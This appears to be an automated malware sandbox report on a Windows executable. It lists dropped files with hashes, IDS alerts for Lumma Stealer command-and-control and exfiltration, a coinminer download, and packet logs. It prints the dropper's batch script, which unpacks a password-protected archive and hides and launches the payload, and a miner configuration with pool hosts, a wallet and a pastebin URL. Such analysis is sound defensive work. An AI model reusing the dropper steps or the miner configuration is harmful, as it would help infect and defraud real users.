                                                                                                                                                                                MD5:3B90F281C49BDF17DA4ADF690E2A475D
                                                                                                                                                                                SHA1:86821013A23E5048882BF58711D0549695ACA67D
                                                                                                                                                                                SHA-256:864947AD239B5E7B903C862FADF82E296EE048D73B70F4FCA516770271F2A741
                                                                                                                                                                                SHA-512:6F92DB4B36DF182BFB576863A1DF1A8C3AF4929135226ABE5B6B3C59FE6F43E39E4563CCDD22F35D28277B8C826590079A1DEB68BE39F7609E7FDEFAA4209B9E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Ye.*............file_8.zipPK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\file.bin

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe
                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2180698
                                                                                                                                                                                Entropy (8bit):7.99990891733921
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                                                                                                                                                MD5:AE5771940899F79E634B6E4475040467
                                                                                                                                                                                SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                                                                                                                                                SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                                                                                                                                                SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2180698
                                                                                                                                                                                Entropy (8bit):7.99990891733921
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                                                                                                                                                MD5:AE5771940899F79E634B6E4475040467
                                                                                                                                                                                SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                                                                                                                                                SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                                                                                                                                                SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\main.bat

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):476
                                                                                                                                                                                Entropy (8bit):5.09690163183538
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:QUp+CF16g64CTFMj2LIQLvvk7WYCVGrMLvmuCCgXjgrXgX78agXrrEOXUigXY:QUpNF16g632Ckevk7WYCVGYTtS0rXS7Y
                                                                                                                                                                                MD5:A6D611790D8AFE6E81448CDF6DDB9EA4
                                                                                                                                                                                SHA1:4E402E68FC7130433A7004CBCE3834A8743BCF4C
                                                                                                                                                                                SHA-256:0C7BE4C51CD64A8B6D2235EE0EEAB8C98C565ED9B74B50C0EBA02750C3B24B2F
                                                                                                                                                                                SHA-512:2FAA6DE4F3E2872FE2575F775C282E17FAFB5AD4C31EB1DE118081F80F28B33E0C1ACFEC0779B5911314BA50A5A5C1EC11491A393C272F3EAB943636A6BF4938
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p29586644319935208542739921766 -oextracted ..for /l %%i in (11,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "Installer.exe" ../..cd....rd /s /q extracted..attrib +H "Installer.exe"..start "" "Installer.exe"..cls..echo Launched 'Installer.exe'...pause..del /f /q "Installer.exe"..

                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                Entropy (8bit):4.393787887610402
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:Hl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAAOBSqa:F4vF0MYQUMM6VFYSAU
                                                                                                                                                                                MD5:16DCAE3D3185D1F91F4C625595040667
                                                                                                                                                                                SHA1:92B823431F9B92B8B3E95E52FD88A37F693C3B55
                                                                                                                                                                                SHA-256:12EDA1087DD6BDD4F02F516BE69B80D245232F84531339257EC5B27F90272803
                                                                                                                                                                                SHA-512:8F661D082CFC39878C78A94F9E069667B481849E5FD8ED6C8CACE9DE21243F378539B3DAC0560D0CFC923683A6CC046850652BC0B6C215C35A64F29B61A91444
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ%..I3.................................................................................................................................................................................................................................................................................................................................................&........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\logs.uce

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):344
                                                                                                                                                                                Entropy (8bit):5.684574010345154
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAKZ:uwgyXmGwgyoH55GT2Qtyc3n1KAi
                                                                                                                                                                                MD5:FAC0827324A254D56B80351D3A0A676C
                                                                                                                                                                                SHA1:7140E81D0844422A4F1EB9C083D0E3F8B195CC89
                                                                                                                                                                                SHA-256:A12A06E88A3E1AD525A1F9D10227CF015C516705094DBEEC67BB1275B36064D1
                                                                                                                                                                                SHA-512:F84F82A35500701F6E80D926399B9C21B287A4A13981E7B646A26AAA831E53335EBF832ACAB367D01A778F1A35A0336C62938F66800D51CB2E00577113EEE122
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/dq3hWX27..

                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):345
                                                                                                                                                                                Entropy (8bit):5.046538254653124
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioB4Dc8NmVSTgqF1AivwtHgN6qFfpap1tNGpKoip:pMpDh5RwXlCfTgqFyYw7qJA1tNGkoC
                                                                                                                                                                                MD5:5155BABB04DC876A4871112BA3AC2716
                                                                                                                                                                                SHA1:F7A7E8D917F4B829610ED476A51BE9096CF66918
                                                                                                                                                                                SHA-256:DA8B2175AEE6D2B8300AF87F89FBD77114349B41852CFCA04446CE7BCA990CB2
                                                                                                                                                                                SHA-512:C1A54C1BFC5E493B18C138D964112EC95ACEA7BD9F20F2971F666F6B152DA723A4B999118381FEC8D42F31B6D5F4A0ABA9F684800E0ECA4079A1BD2391D6CD59
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 511531 bytes (500 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 511531.... 0%. .Everything is Ok....Size: 625464..Compressed: 511531..

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                Entropy (8bit):7.427072675404814
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:PqSIlYOaIF.exe
                                                                                                                                                                                File size:1'250'816 bytes
                                                                                                                                                                                MD5:40afdfd06da2cbfab2cfb3444b60174c
                                                                                                                                                                                SHA1:baf21b9229c78bfeb1dfd2a898029bae1e1075bd
                                                                                                                                                                                SHA256:007310a11e7dfdb4fa9dd2e216f92cda9a1954c7be76a33aaf8028206a0c0258
                                                                                                                                                                                SHA512:00aa8a003afb2a84c771011c5062cfde9e4ecced6421a26b929f56a100ff935883f155cec77622b59a1543ae411e57d2a2d0ff7a16f62685fa68fa0653abe809
                                                                                                                                                                                SSDEEP:24576:m6hD7LpDPaCoflmQMOsaED7biogA/kItUbLKVGsTSefLHAWuQrA3ak20A:zTp7oLlx+7bc2kI+bLKVGaSuLgWKKzH
                                                                                                                                                                                TLSH:8545E043F2C34093FBA354702B29C9A5D8293AB3BB291DEB909C854885F59DFC973527
                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...22.g.................:........................@..........................p............@.................................(...<..

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x4bc190
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x672E3232 [Fri Nov 8 15:45:54 2024 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:edcf314155b6a0d1898757c320d085ee

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                call 00007F00C8BC859Ah
                                                                                                                                                                                jmp 00007F00C8BC83FDh
                                                                                                                                                                                mov ecx, dword ptr [004E27B4h]
                                                                                                                                                                                push esi
                                                                                                                                                                                push edi
                                                                                                                                                                                mov edi, BB40E64Eh
                                                                                                                                                                                mov esi, FFFF0000h
                                                                                                                                                                                cmp ecx, edi
                                                                                                                                                                                je 00007F00C8BC8596h
                                                                                                                                                                                test esi, ecx
                                                                                                                                                                                jne 00007F00C8BC85B8h
                                                                                                                                                                                call 00007F00C8BC85C1h
                                                                                                                                                                                mov ecx, eax
                                                                                                                                                                                cmp ecx, edi
                                                                                                                                                                                jne 00007F00C8BC8599h
                                                                                                                                                                                mov ecx, BB40E64Fh
                                                                                                                                                                                jmp 00007F00C8BC85A0h
                                                                                                                                                                                test esi, ecx
                                                                                                                                                                                jne 00007F00C8BC859Ch
                                                                                                                                                                                or eax, 00004711h
                                                                                                                                                                                shl eax, 10h
                                                                                                                                                                                or ecx, eax
                                                                                                                                                                                mov dword ptr [004E27B4h], ecx
                                                                                                                                                                                not ecx
                                                                                                                                                                                pop edi
                                                                                                                                                                                mov dword ptr [004E27B0h], ecx
                                                                                                                                                                                pop esi
                                                                                                                                                                                ret
                                                                                                                                                                                push ebp
                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                sub esp, 14h
                                                                                                                                                                                and dword ptr [ebp-0Ch], 00000000h
                                                                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                and dword ptr [ebp-08h], 00000000h
                                                                                                                                                                                push eax
                                                                                                                                                                                call dword ptr [004E0654h]
                                                                                                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                                                                                call dword ptr [004E0618h]
                                                                                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                                                                                call dword ptr [004E0614h]
                                                                                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                push eax
                                                                                                                                                                                call dword ptr [004E069Ch]
                                                                                                                                                                                mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                xor eax, ecx
                                                                                                                                                                                leave
                                                                                                                                                                                ret
                                                                                                                                                                                mov eax, 00004000h
                                                                                                                                                                                ret
                                                                                                                                                                                push 004E4258h
                                                                                                                                                                                call dword ptr [004E0674h]
                                                                                                                                                                                ret
                                                                                                                                                                                push 00030000h
                                                                                                                                                                                push 00010000h
                                                                                                                                                                                push 00000000h
                                                                                                                                                                                call 00007F00C8BCDAC3h
                                                                                                                                                                                add esp, 0Ch

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xe04280x3c.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xe70000x2840.reloc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xdc7900x18.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xd5da80xc0.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xe05b00x14c.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000xd389a0xd3a000a15321b2bccb9d876db2931e1cebe03False0.6717861691523922data7.037408583368191IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rdata0xd50000xc8540xca00d1c860b0a021545bc53c30e1f9acd95eFalse0.49145266089108913data5.414910186219469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .data0xe20000x2a200x1600c845ab4a81ea600b04809c5372e2ef60False0.39790482954545453data4.577734690648612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .00cfg0xe50000x80x200bdf8beaad906d2779f71e1fc6ef7bdeaFalse0.03125data0.04078075625387198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .tls0xe60000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .reloc0xe70000x28400x2a007d420c21b9f9a28ff7bc622ca4d1840dFalse0.7193080357142857GLS_BINARY_LSB_FIRST6.261938217092016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .open0xea0000x4c8000x4c80056b9e47a000d93eb3ed417ae7bf4ad65False1.0003382863562091data7.999448516227556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                USER32.dllAddClipboardFormatListener
                                                                                                                                                                                KERNEL32.dllCloseHandle, CompareStringW, CreateEventW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ResetEvent, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-11-10T09:18:08.793746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949744104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:09.319640+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949744104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:09.319640+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949744104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:10.027265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949751104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:10.547975+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949751104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:10.547975+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949751104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:11.483167+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949761104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:12.997750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949769104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:13.810342+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949769104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:14.620844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949781104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:17.132513+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949798104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:18.907281+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949808104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:21.877432+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949824104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:22.362223+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949824104.21.39.3443TCP
                                                                                                                                                                                2024-11-10T09:18:22.738243+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.949827TCP
                                                                                                                                                                                2024-11-10T09:18:41.070302+01002829056ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download2192.168.2.949933147.45.47.8180TCP
                                                                                                                                                                                2024-11-10T09:19:00.782289+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.949990TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 10, 2024 09:18:08.147346973 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.147382975 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:08.147464037 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.175023079 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.175040960 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:08.793595076 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:08.793745995 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.796691895 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.796711922 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:08.796979904 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:08.839943886 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.883316994 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.883341074 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:08.883409977 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:09.319655895 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:09.319756031 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:09.319814920 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:09.338265896 CET49744443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:09.338289022 CET44349744104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:09.413177013 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:09.413234949 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:09.413301945 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:09.413599014 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:09.413611889 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.027168036 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.027265072 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.061383009 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.061405897 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.061738014 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.070312977 CET49751443192.168.2.9104.21.39.3
